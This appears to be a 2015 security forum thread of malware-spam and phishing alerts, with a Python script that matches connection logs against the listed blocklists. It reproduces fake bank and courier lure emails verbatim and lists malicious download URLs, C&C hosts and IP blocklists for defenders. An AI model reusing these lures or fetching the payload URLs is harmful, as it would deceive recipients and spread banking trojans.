176e92e7cfc0e57be83e901c36ba17b255ba0b1b
30e4decd68808cb607c2aba4aa69fb5fdb598c64 ..."

- http://arstechnica.com/security/2015/02/spyware-aimed-at-western-governments-journalists-hits-ios-devices/
Feb 4 2015
___

Apps on Google Play Pose As Games - Infect Millions with Adware
- https://blog.avast.com/2015/02/03/apps-on-google-play-pose-as-games-and-infect-millions-of-users-with-adware/
Feb 3, 2015 - "A couple of days ago, a user posted a comment on our forum* regarding apps harboring adware that can be found on Google Play. This didn’t seem like anything spectacular at the beginning, but once I took a closer look it turned out that this malware was a bit bigger than I initially thought. First of all, the apps are on Google Play, meaning that they have a huge target audience – in English speaking and other language regions as well. Second, the apps were already downloaded by millions of users and third, I was surprised that the adware lead to some legitimate companies:
> https://blog.avast.com/wp-content/uploads/2015/02/Durak-game-GP.png
The Durak card game app was the most widespread of the malicious apps with 5–10 million installations according to Google Play:
> https://blog.avast.com/wp-content/uploads/2015/02/Durak-1-player-2-player-rules-300x168.png
When you install Durak, it seems to be a completely normal and well working gaming app. This was the same for the other apps, which included an IQ test and a history app. This impression remains until you reboot your device and wait for a couple of days. After a week, you might start to feel there is something wrong with your device. Some of the apps wait up to 30 days until they show their true colors. After 30 days, I guess not many people would know which app is causing abnormal behavior on their phone, right? Each time you unlock your device an ad is presented to you, warning you about a problem, e.g. that your device is infected, out of date or full of porn. This, of course, is a complete lie. You are then asked to take action, however, if you approve you get re-directed to harmful threats on fake pages, like dubious app stores and apps that attempt to send premium SMS behind your back or to apps that simply collect too much of your data for comfort while offering you no additional value.
> https://blog.avast.com/wp-content/uploads/2015/02/Threats-detected-malcious-apps-300x261.jpg
An even bigger surprise was that users were sometimes directed to security apps on Google Play. These security apps are, of course, harmless, but would security providers really want to promote their apps via adware? Even if you install the security apps, the undesirable ads popping up on your phone don‘t stop. This kind of threat can be considered good social engineering. Most people won‘t be able to find the source of the problem and will face fake ads each time they unlock their device. I believe that most people will trust that there is a problem that can be solved with one of the apps advertised “solutions” and will follow the recommended steps, which may lead to an investment into unwanted apps from -untrusted- sources... the apps’ descriptions should make users -skeptical- about the legitimacy of the apps. Both in English and in other languages such as German, were written poorly: “A card game called ‘Durak‘ – one of the most common and well known game“. The apps‘ secure hash algorithm (SHA256) is the following:
BDFBF9DE49E71331FFDFD04839B2B0810802F8C8BB9BE93B5A7E370958762836
9502DFC2D14C962CF1A1A9CDF01BD56416E60DAFC088BC54C177096D033410ED
FCF88C8268A7AC97BF10C323EB2828E2025FEEA13CDC6554770E7591CDED462D "

* https://forum.avast.com/?topic=165003.0
___

Data Integrity: The Core of Security
- http://www.securityweek.com/data-integrity-core-security
Feb 4, 2015 - "... Companies spend huge sums of money every year to maintain a security perimeter designed to fend off cyber and insider threats. According to Gartner*, worldwide spending on information security will reach $71.1 billion in 2014, an increase of 7.9 percent over 2013. Total information security spending will grow a further 8.2 percent in 2015 to reach $76.9 billion. Other Gartner figures show that in 2013, average budget allocations for information security were 5.1% of the overall IT budget, up 8.5% from 2012. However, the majority of investments are aimed at bolstering traditional perimeter security defenses, which is a losing battle... if we can prevent data from leaving the organization or being modified, protecting against network breaches becomes less critical. Unfortunately, data is often left unsecured... When it comes to information security, 100 percent protection is unattainable. However, by supplementing traditional perimeter defense mechanisms with data integrity principles, organizations can significantly reduce their exposure to Sony scale data breaches."
* http://www.gartner.com/newsroom/id/2828722
___

YouTube dumps Flash for HTML5
- http://www.infoworld.com/article/2877283/web-development/youtube-dumps-flash-for-html5.html
Jan 30, 2015 - "In a blow to proprietary rich Internet plug-ins, YouTube, which had been a stalwart supporter of Adobe’s Flash plug-in technology, revealed this week that it now -defaults- to the HTML5 <video> tag. The move shows HTML5's continued march toward Web dominance... Late Apple founder Steve Jobs probably did the most to further the decline by refusing to support Flash on the company’s wildly popular iOS handheld devices. In fact, Flash shows a downward trajectory on W3Techs' report* on the number of websites using Adobe’s multimedia platform. It has -dropped- to 11.9 percent this month versus more than 15 percent a year ago. The numbers are far worse for Microsoft’s late-arriving Flash rival, Silverlight..."
* http://w3techs.com/technologies/details/cp-flash/all/all

:fear: :spider:

AplusWebMaster
2015-02-05, 18:45
FYI...

Fake HSBC SPAM - PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-advice-fake-pdf-malware/
5 Feb 2015 - "'HSBC Payment Advice' pretending to come from HSBC <no-replay@ hsbci .co .uk> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Sir/Madam
Upon your request, attached please find payment e-Advice for your
reference.
Yours faithfully
HSBC
We maintain strict security standards and procedures to prevent
unauthorised access to information about you. HSBC will never contact
you by e-mail or otherwise to ask you to validate personal information
such as your user ID, password, or account numbers. If you receive such
a request, please call our Direct Financial Services hotline.
Please do not reply to this e-mail. Should you wish to contact us,
please send your e-mail to commercialbanking@ hsbc .co .uk and we will
respond to you.
Note: it is important that you do not provide your account or credit
card numbers, or convey any confidential information or banking
instructions, in your reply mail.
Copyright. The Hongkong and Shanghai Banking Corporation Limited 2005.
All rights reserved...

5 February 2015: HSBC-69695.zip: Extracts to: CashPro.exe
Current Virus total detections: 4/56*. This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1f89e7f265686922f62acb94d4dd193197190574c953fbcf81ec729c72dadd35/analysis/1423139205/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
93.157.100.56: https://www.virustotal.com/en/ip-address/93.157.100.56/information/
178.47.141.100: https://www.virustotal.com/en/ip-address/178.47.141.100/information/
___

Fake FedEx SPAM - malicious script
- http://blog.dynamoo.com/2015/02/malware-spam-unable-to-deliver-your.html
5 Feb 2015 - "This -fake- FedEx spam has a malicious script attached.
From: FedEx 2Day A.M.
Date: 5 February 2015 at 15:01
Subject: PETRO, Unable to deliver your item, #0000220741
Dear Petro,
We could not deliver your item.
You can review complete details of your order in the find attached.
Yours sincerely,
Marion Bacon,
Delivery Manager.
(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws.

Attached is a file FedEx_0000220741.zip which contains a malicious javascript which is highly obfuscated... but it is a bit clearer when deobfuscated... This script has a moderate detection rate of 9/56*, and downloads a file from:
http ://freesmsmantra .com/document.php?id=5451565E140110160B0824140110160B08000D160107104A070B09&rnd=3252631
Which is saved as %TEMP%\11827407.exe. This has a low detection rate of 3/56**. Automated analysis tools... don't give much of a clue as it has been hardened against analysis."
* https://www.virustotal.com/en/file/7284754c52f850158c541e00b28ab7ae1516c8161738da11c64bd5b259b48e12/analysis/1423149508/

** https://www.virustotal.com/en/file/cfa3dccd88c033117bccee4e01958b20253bfb562d82a73fa6ab65874abd66db/analysis/1423148815/

50.31.134.98: https://www.virustotal.com/en/ip-address/50.31.134.98/information/
___

Fake Barclays SPAM – Phish ...
- http://myonlinesecurity.co.uk/new-barclays-service-important-notice-phishing/
5 Feb 2015 - "'New Barclays Service Important Notice' pretending to come from Barclays Service [mailto:secure@ barclaysalertid .com] is one of the latest phish attempts to steal your Barclays Bank details. We have been seeing a quite large increase in Barclays phishing emails over the last week or so. Today’s version is particularly well done with a domain that will fool a lot of people...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/barclaycard_phishing-email_1.png

If you follow-the-link, you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish1.png
You then get:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish_check.png
Then you get this page which tries to convince you that various African IP addresses have accessed your account and scare you into going further:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish2.png
You then get the processing/checking screen again before being sent on to:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish3-1024x646.png
Where they ask you to fill in your name, details and passcodes, the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and format. And then once again to the processing/checking screen before you are sent on to the final page where they say they will send you a new pinsentry device by post:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish4-1024x603.png
All of these emails use Social engineering tricks to persuade you to open-the-attachments that come with the email..."

:fear: :mad:

AplusWebMaster
2015-02-06, 14:56
FYI...

Something evil on 5.196.143.0/28 and 5.196.141.24/29 ...
- http://blog.dynamoo.com/2015/02/something-evil-on-5196143028-and.html
6 Feb 2015 - "... interesting blog post from Cyphort* got me digging into that part of the infection chain using nonsense .eu domains. It uncovered a whole series of IPs and domains that have been used to spread Cryptowall (possibly other malware too), hosted in the 5.196.143.0/28 and 5.196.141.24/29 ranges (and possibly more). These are OVH IP ranges, suballocated to a customer called Verelox .com. I think that Verelox is a legitimate but very small web host that has suffered a major compromise of their servers. The first range is 5.196.141.24/29 which has apparently compromised servers at:
5.196.141.24, 5.196.141.25, 5.196.141.26, 5.196.141.27
... The second range is 5.196.143.0/28 with apparently -compromised- servers at:
5.196.143.3, 5.196.143.4, 5.196.143.5, 5.196.143.6, 5.196.143.7, 5.196.143.8, 5.196.143.10, 5.196.143.11,
5.196.143.12, 5.196.143.13
In addition to this, some of these domains use nameservers on the following IP addresses:
168.235.70.106
168.235.69.219
These are allocated to Ramnode LLC in the US. I would suggest that they are under the control of the bad guys and are worth -blocking- traffic to.
Note that Cyphort identify these C&C servers for the malware:
asthalproperties .com:4444
pratikconsultancy .com:8080
The following IPs and domain names all seem to be connected and I would recommend -blocking- at least the IP addresses and domains... other domains look like they are probably throwaway ones:
5.196.143.0/28
5.196.141.24/29
168.235.69.219
168.235.70.106
asthalproperties .com
pratikconsultancy .com ..."
(More detail at the dynamoo URL at the top of this post.)

* http://www.cyphort.com/gopego-malvertising-cryptowall/
___

Fake 'CashPro Online' SPAM – PDF malware
- http://myonlinesecurity.co.uk/cashpro-online-digital-certificate-fake-pdf-malware/
6 Feb 2015 - "'Your CashPro Online Digital Certificate' pretending to come from CashPro Online <no-replay@ cashpro .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear CashPro Customer,
This email is being sent to inform you that you have been granted a new
digital certificate for use with Bank of America CashPro Online.
Please open the attachment and you will be guided through a simple
process to install your new digital certificate.
If you have any questions or concerns, please contact the Bank of
America technical help desk.
Thank you for your business,
Bank of America
CashPro Online Security Team
Please do not reply to this email .
Copyright 2015 Bank of America Merrill Lynch. All rights reserved.
CashPro is a registered trademark of Bank of America Corporation.

6 February 2015: docs-20276.zip: Extracts to: docs.exe
Current Virus total detections: 3/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5387585bc905f6304b190493af158a714bdd0baed1be7e81db40407d4a92af01/analysis/1423239330/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
178.47.141.100: https://www.virustotal.com/en/ip-address/178.47.141.100/information/
192.185.35.92: https://www.virustotal.com/en/ip-address/192.185.35.92/information/
71.18.62.202: https://www.virustotal.com/en/ip-address/71.18.62.202/information/
UDP communications
77.72.174.163: https://www.virustotal.com/en/ip-address/77.72.174.163/information/

- http://threattrack.tumblr.com/post/110256192178/bank-of-america-cashpro-spam
Feb 6, 2015
docs.exe (1D38C362198AD67329FDF58B4743165E)
Tagged: bank of america, cashpro, Upatre

:fear::fear: :mad:

AplusWebMaster
2015-02-09, 17:59
FYI...

Fake 'Lloyds new message' SPAM – PDF malware
- http://myonlinesecurity.co.uk/lloyds-new-message-fake-pdf-malware/
9 Feb 2015 - "'You have a new message pretending to come from Lloyds Commercial Banking <GrpLloydslinkHelpdesk@ lloydsbanking .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Lloyds Commercial Logo
We want you to recognise a fraudulent email if you receive one. Lloyds Bank will always greet you personally using your title and surname and, where you hold an existing account with us, the last four digits of your account number: XXXX1328.
Dear Lloyds Link Customer,
You have a new message
There’s a new message for you, messages contain information about your account, so it’s important to view them.
If you’ve chosen to use a shared email address, please note that anyone who has access to your email account will be able to view your messages.
Please check attached message for more details.
Subject
Date
Account details
Account number
Important information about your account
09 Feb 2015
Lloyds Commercial
XXXX1328
Please note: this message is important and needs your immediate attention. Please check attached file straightaway to view it.
Yours sincerely
Signature image of Nicholas Williams - Consumer Digital Director
Nicholas Williams,
Consumer Digital Director
Please do not reply to this email as this address is not manned and cannot receive any replies.
Lloyds Bank plc. Registered Office: 25 Gresham Street, London EC2V 7HN. Registered in England and Wales, number 2065. Telephone: 020 7626 1500.
Lloyds Bank plc is authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority under registration number 119278.

9 February 2015: ImportantMessage.zip: Extracts to: ImportantMessage.scr
Current Virus total detections: 6/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a1baf36ebbc6ba4091f4c44e3b730fc376be6064884e1c50ee9a6e9ab4d6becd/analysis/1423485253/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
94.41.208.125: https://www.virustotal.com/en/ip-address/94.41.208.125/information/
198.23.48.157: https://www.virustotal.com/en/ip-address/198.23.48.157/information/
UDP communications
77.72.174.165: https://www.virustotal.com/en/ip-address/77.72.174.165/information/
77.72.174.164: https://www.virustotal.com/en/ip-address/77.72.174.164/information/
___

Fake 'Lloyds new debit' SPAM - PDF malware
- http://myonlinesecurity.co.uk/lloyds-received-new-debit-fake-pdf-malware/
9 Feb 2015 - "'You have received a new debit' pretending to come from Payments Admin <paymentsadmin@ lloydstsb .co .uk> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Monday 09 February 2014
This is an automatically generated email by the Lloyds TSB PLC
LloydsLink online payments Service to inform you that you have receive a
NEW Payment.
The details of the payment are attached.
This e-mail (including any attachments) is private and confidential and
may contain privileged material. If you have received this e-mail in
error, please notify the sender and delete it (including any
attachments) immediately. You must not copy, distribute, disclose or use
any of the information in it or any attachments.

9 February 2015 : details#00390702.zip: Extracts to: details.exe
Current Virus total detections: 6/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f7412fe1b3fa064fe1897d20be1e39e0a7cba3d25a081f23dd69d03a98dd34ca/analysis/1423485121/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
94.41.208.125: https://www.virustotal.com/en/ip-address/94.41.208.125/information/
91.103.216.71: https://www.virustotal.com/en/ip-address/91.103.216.71/information/
UDP communications
77.72.174.167: https://www.virustotal.com/en/ip-address/77.72.174.167/information/
77.72.174.166: https://www.virustotal.com/en/ip-address/77.72.174.166/information/

:fear: :mad:

AplusWebMaster
2015-02-10, 15:59
FYI...

Fake 'Amazon Order' SPAM – malware
- http://myonlinesecurity.co.uk/amazon-order-details-malware/
10 Feb 2015 - "'Amazon Order Details' pretending to come from Amazon.com <delivers@ amazon .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This one is a lazy attempt to spread the malware using an old email from last year saying Order R:121216 Placed on June 28, 2014...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Amazon-Order-Details-1024x422.png

Today's Date: order_report.zip: Extracts to: order_report_238974983274928374892374982.exe
Current Virus total detections: 2/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5fc22d2913d37ee645965909c55c33b669a78f86688187b1a20c94f87076b0ef/analysis/1423571463/
___

Fake 'Purchase Order' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-megtrade-groups.html
10 Feb 2015 - "This spam comes with a malicious attachment:
From: Megtrade groups [venkianch@ gmail .com]
Reply-To: venkanch@ gmail .com
Date: 10 February 2015 at 15:47
Subject: RE: Purchase Order Copy
Hello Vendor,
I just got back from business trip, Please find attached our purchasing order let us know price so as to confirm sample with your company.
You give us your payment terms but note our company payment policy 30% prepayment after confirming proforma invoice from you and the balance against copy of B/L.
Kindly treat as urgent and send invoice, I await to have your urgent reply to proceed.
Thanks & Best regards,
Mr Venkianch
Managing Director
NZ Megtrade Groups Ltd ... Download Attachment As zip

Unusually, this email does -not- appear to be sent out by a botnet but has been sent through -Gmail-. The link in the email goes to www .ebayonline .com .ng/download/ohafi/jfred/Purchase%20Order%20Copy_pdf.7z where it downloads a file Purchase Order Copy_pdf.7z which (if you have 7-Zip installed) uncompresses to the trickily-named:
(1) Purchase Order Copy.pdf ___________________
(2) Delivery Time and Packing.pdf _______________________ _____ Adobe Reader.pdf
... or in .exe
As you might expect, this is malicious in nature and has a VirusTotal detection rate of 34/57*. The Malwr analysis** indicates that this installs a -keylogger- among other things."
* https://www.virustotal.com/en/file/0f24103be25179ed2d97c273ece36744612a81b57833c7d6f79d3b83b88f6761/analysis/1423585487/

** https://malwr.com/analysis/NmFjMWRhZWQyYjVmNDNlNjlmY2ZmMzdkMDRmYTM2NzI/

:fear: :mad:

AplusWebMaster
2015-02-11, 15:23
FYI...

Fake 'e-invoice' SPAM
- http://blog.dynamoo.com/2015/02/malware-spam-your-latest-e-invoice-from.html
11 Feb 2015 - "This -fake- invoice spam has a malicious attachment:
From: Lydia Oneal
Date: 11 February 2015 at 09:14
Subject: Your latest e-invoice from HSBC HLDGS
Dear Valued Customer,
Please find attached your latest invoice that has been posted to your online account. You’ll be pleased to know that your normal payment terms still apply as detailed on your invoice.
Rest assured, we operate a secure system, so we can confirm that the invoice DOC originates from HSBC HLDGS and is authenticated with a digital signature.
Thank you for using e-invoicing with HSBC HLDGS - the smarter, faster, greener way of processing invoices.
This message and any attachment are confidential and may be privileged or otherwise protected from disclosure.
If you are not the intended recipient, please telephone or email the sender and delete this message and any attachment from your system.
If you are not the intended recipient you must not copy this message or attachment or disclose the contents to any other person.

The company name and the name of the sender varies, but most of the body text remains identical. Some sample subjects are:
Your latest e-invoice from HSBC HLDGS
Your latest e-invoice from MAVEN INCOME & GROWTH VCT 3 PLC
Your latest e-invoice from DDD GROUP PLC
Your latest e-invoice from BAILLIE GIFFORD SHIN NIPPON
Your latest e-invoice from ACAL
Your latest e-invoice from PARAGON DIAMONDS LTD
Your latest e-invoice from TULLETT PREBON PLC
Your latest e-invoice from MERSEY DOCKS & HARBOUR CO
Your latest e-invoice from HOLDERS TECHNOLOGY
Your latest e-invoice from LED INTL HLDGS LTD
Your latest e-invoice from HALOS
Your latest e-invoice from ACORN INCOME FUND
The word document is randomly-named, for example 256IFV.doc, 19093WZ.doc and 097DVN.doc. There are three different versions of this malicious document, all with low detection rates [1] [2] [3] containing a slightly different macro in each case... The malware probably drops a Dridex DLL, although I have not been able to obtain this.
Recommended blocklist:
85.143.166.72
92.63.88.97
205.185.119.159
78.129.153.18
5.14.26.146
136.243.237.222
185.48.56.62
95.163.121.216 "
1] https://www.virustotal.com/en/file/049f8f402af29fcb09cd552b03eb23ee678428634920a2acd7096e646054d598/analysis/1423650591/

2] https://www.virustotal.com/en/file/60ad4099e56ed5a8fddb63395b0e0032726b5aaf47a71d590dddf147b433a976/analysis/1423650604/

3] https://www.virustotal.com/en/file/fdb34b9f8e3d6ee1098db6dfc800ff6a221ec10896536ad3ec3b4d31da77dc65/analysis/1423650615/


- http://myonlinesecurity.co.uk/latest-e-invoice-word-doc-malware/
11 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Your-latest-e-invoice-from-FINNAUST-MINING-PLC.png
___

Fake 'Outstanding Invoice' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-gail-walker.html
11 Feb 2015 - "This fake invoice does -NOT- come from MBL Seminars, they are -not- sending this spam nor have their systems been compromised. Instead, this is a -forgery- with a malicious attachment.
From: Gail Walker [gail@ mblseminars .com]
Date: 11 February 2015 at 09:52
Subject: Outstanding Invoice 271741
Dear Customer
Payment for your Season Ticket was due by 31 January 2015 and has not yet been received. A copy of the invoice is attached.
By way of a reminder, the Season Ticket entitles all members of your organisation to save up to 50% on our public seminars and webinars. Since being a Season Ticket Holder your organisation has saved £728.50.
Please arrange for payment by return by BACS, cheque, or credit card. If payment has been arranged and just not reached us yet then please ignore this email.
If you have any queries, please do not hesitate to contact us.
Regards
Gail Walker
MBL (Seminars) Limited ...

So far I have seen two different malicious Word documents (there may be more) with low detection rates [1] [2] containing a different macro each... This file is saved as %TEMP%\dsHHH.exe. It has a VirusTotal detection rate of 10/57*... It also drops a DLL with a detection rate of 3/57** which is probably Dridex.
Recommended blocklist:
37.139.47.105
5.39.99.18
136.243.237.218
66.110.179.66
78.140.164.160
109.234.38.70 "
1] https://www.virustotal.com/en/file/30b22b141dcab6cc981008ddb04d95f90fa87ce2aeb41affd27bd5a704f62fd4/analysis/1423653571/

2] https://www.virustotal.com/en/file/83223934492586e28666cdb2ee4bf2bb3e78ead6d78d691274a5fe27a7fbb9a3/analysis/1423653583/

* https://www.virustotal.com/en/file/9e873d66a8663fcbccc0a959adbbc924e3cbc4cd04746411d3ffbd7d5337220e/analysis/1423653592/

** https://www.virustotal.com/en/file/10bf548e73dffefc5f4da1fa6d3d61922fec614726f18a22f49be0e8f9f7901e/analysis/1423654973/


- http://myonlinesecurity.co.uk/gail-walker-mbl-seminars-limited-outstanding-invoice-271741-word-doc-malware/
11 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Outstanding-Invoice-271741.png

:fear: :mad:
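The "Something evil on 5.196.143.0/28" post above and the Dridex "Recommended blocklist" lists in the e-invoice and MBL Seminars posts all boil down to the same operational task: checking outbound connections against a mix of CIDR ranges, single IPs and C&C domains. The script below is an added example for this thread, not code from dynamoo, Cyphort or the other sites quoted here. It uses the indicators those posts publish, runs them over a constructed log in a hypothetical key=value format (the field names `dst=` and `host=` are an assumption), and reports which lines touch the blocklist. Note that a bare address becomes a /32, so single IPs and ranges are handled by the same loop, and that domain matching also catches subdomains without matching look-alike names such as notasthalproperties.com.

```python
"""Match connection logs against the blocklists from the posts above (CIDR
ranges, single IPs, C&C domains). Added example for this thread; not code from
the dynamoo or Cyphort posts it draws its indicators from."""
import ipaddress
import re

# Indicators copied from the posts: the OVH ranges suballocated to Verelox,
# the Ramnode nameserver IPs, Cyphort's CryptoWall C&C hosts and the Dridex
# blocklists from the e-invoice and MBL Seminars runs.
BLOCK_NETS = [
    "5.196.143.0/28", "5.196.141.24/29",
    "168.235.69.219", "168.235.70.106",
    "85.143.166.72", "92.63.88.97", "205.185.119.159", "78.129.153.18",
    "5.14.26.146", "136.243.237.222", "185.48.56.62", "95.163.121.216",
    "37.139.47.105", "5.39.99.18", "136.243.237.218", "66.110.179.66",
    "78.140.164.160", "109.234.38.70",
]
BLOCK_DOMAINS = ["asthalproperties.com", "pratikconsultancy.com"]

# Constructed proxy/firewall log lines in a hypothetical key=value format.
SAMPLE_LOG = """\
2015-02-06T10:00:01 src=10.1.2.3 dst=5.196.143.7 dport=80 host=-
2015-02-06T10:00:02 src=10.1.2.3 dst=93.184.216.34 dport=443 host=example.com
2015-02-06T10:00:03 src=10.1.2.9 dst=5.196.141.30 dport=80 host=-
2015-02-06T10:00:04 src=10.1.2.9 dst=5.196.143.20 dport=80 host=-
2015-02-06T10:00:05 src=10.1.2.5 dst=203.0.113.8 dport=4444 host=www.asthalproperties.com
2015-02-06T10:00:06 src=10.1.2.5 dst=203.0.113.9 dport=80 host=notasthalproperties.com
2015-02-06T10:00:07 src=10.1.2.7 dst=136.243.237.218 dport=8080 host=-
"""
LINE_RE = re.compile(r"dst=(?P<dst>\S+).*?host=(?P<host>\S+)")


def compile_nets(entries):
    """Turn each entry into an ip_network; a bare address becomes a /32 or /128."""
    return [ipaddress.ip_network(e, strict=False) for e in entries]


def ip_match(addr, nets):
    """Return the first blocklisted network containing addr, else None."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return None
    for net in nets:
        if ip.version == net.version and ip in net:
            return net
    return None


def domain_match(host, domains):
    """Exact or subdomain match; case-insensitive, trailing dot tolerated."""
    h = host.lower().rstrip(".")
    for d in domains:
        if h == d or h.endswith("." + d):
            return d
    return None


def scan_log(text, nets, domains):
    """Return a list of (line_number, indicator) for every line touching the blocklist."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.search(line)
        if not m:
            continue
        net = ip_match(m.group("dst"), nets)
        if net is not None:
            hits.append((n, str(net)))
        dom = domain_match(m.group("host"), domains)
        if dom is not None:
            hits.append((n, dom))
    return hits


def run_sample():
    """Scan the constructed log with the indicators from the posts."""
    return scan_log(SAMPLE_LOG, compile_nets(BLOCK_NETS), BLOCK_DOMAINS)


if __name__ == "__main__":
    for lineno, ioc in run_sample():
        print(f"line {lineno}: matched {ioc}")
```

Lines 4 and 6 of the sample are deliberately near misses: 5.196.143.20 sits just outside the /28 (which covers .0 to .15), and notasthalproperties.com shares a suffix with the C&C domain but is not a subdomain of it. Both must stay quiet, otherwise the blocklist generates noise that gets it switched off.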

AplusWebMaster
2015-02-12, 15:38
FYI...

Fake BBB SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-bbb-accreditation-services.html
12 Feb 2015 - "This -fake- BBB email has a malicious attachment.
From: BBB Accreditation Services [no-replay@ newyork .bbb .org]
Date: Thu, 12 Feb 2015 10:50:01 +0000
Subject: BBB SBQ Form
Thank you for supporting your Better Business Bureau (BBB).
As a service to BBB Accredited Businesses, we try to ensure that the information we provide to potential customers is as accurate as possible. In order for us to provide the correct information to the public, we ask that you review the information that we have on file for your company.
We encourage you to print this SBQ Form, answer the questions and respond to us. (Adobe PDF)
Please look carefully at your telephone and fax numbers on this sheet, and let us know any and all numbers used for your business (including 800, 900, rollover, and remote call forwarding). Our automated system is driven by telephone/fax numbers, so having accurate information is critical for consumers to find information about your business easily.
Thank you again for your support, and we look forward to receiving this updated information.
Sincerely,
Accreditation Services

Attached is a file SQB Form.zip which contains a malicious executable SQB Form.exe. This has a VirusTotal detection rate of 4/57*. Automated analysis tools... show that it attempts to connect to these following legitimate IPs and domains to determine the IP address and current time:
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
time.microsoft.akadns .net
checkip.dyndns .org
Of these, checkip.dyndns .org is worth monitoring as it is often an indicator of infection.
The Anubis report also shows a DNS query to semiyun .com on 95.173.170.227*** (Netinternet, Turkey). Also the Malwr report shows connections to the following URLs:
http ://92.240.99.70:12112/1202uk11/HOME/0/51-SP:/0/ELHBEDIBEHGBEHK
http ://92.240.99.70:12112/1202uk11/HOME/41/7/4/
http ://semiyun .com/mandoc/previewa.pdf
Of these, 92.240.99.70 (Ukrainian High Technologies Ltd, Ukraine) looks like the C&C server and this should definitely be -blocked-. A file jeoQxZ5.exe is also dropped with a detection rate of 6/57**. This is most likely the Dyre banking trojan..."
* https://www.virustotal.com/en/file/262d1398851f1f43f4382812e744b3cbc484ae9f4605e03f65c3977919e32a6c/analysis/1423739716/

** https://www.virustotal.com/en/file/1d90a17f9f4a8d0a17c46a82f4e48b8a645ddde67c59cfe89becd34b20a4bd25/analysis/1423741855/

*** 95.173.170.227: https://www.virustotal.com/en/ip-address/95.173.170.227/information/
___

Fake 'invoice :reminder' SPAM - leads to CVE-2012-0158 exploit
- http://blog.dynamoo.com/2015/02/invoice-reminder-spam-leads-to-cve-2012.html
12 Feb 2015 - "This spam has a malicious attachment:
From: Hajime Daichi
Date: 12 February 2015 at 15:59
Subject: invoice :reminder
Greetings.
Please find attached invoice copy for a transfer of USD29,900.00 payed to
your company account yesterday.
You can save, view and print this SWIFT message at your convenience.
Please email should you require any additional information on this
transaction.
We thank you for your continued patronage.
Corp. Office / Showroom:
# 8-2-293/82/A/706/1,
Road No. 36, Jubilee Hills,
HYDERABAD - 500 033.
Tel: +91 40 2355 4474 / 77
Fax:+91 40 2355 4466
E-mail: info@ valueline .in
Branches : VIZAG | VIJAYAWADA | BANGALORE | MUMBA

Attached is a file INVOICE.doc which is actually not a DOC at all, but an RTF file. A scan of the file at VirusTotal indicates that it is malicious, with a detection rate of 6/57*. Those detections indicate that this is exploiting CVE-2012-0158 aka MS12-027, a security flaw patched almost three years ago. So if you keep your patches up-to-date, there's a good chance you will be OK. But if you are running an ancient version of Microsoft Office (for example Office 2000, 2002 or XP) then you could be in trouble. The Malwr report for this is quite enlightening, showing the malware downloading another document from directxex .net/7783ed117ba0d69e/wisdomjacobs.exe. This has a detection rate of 14/57** and the Malwr report for this indicates that among other things it installs a -keylogger- confirmed by the ThreatExpert report.
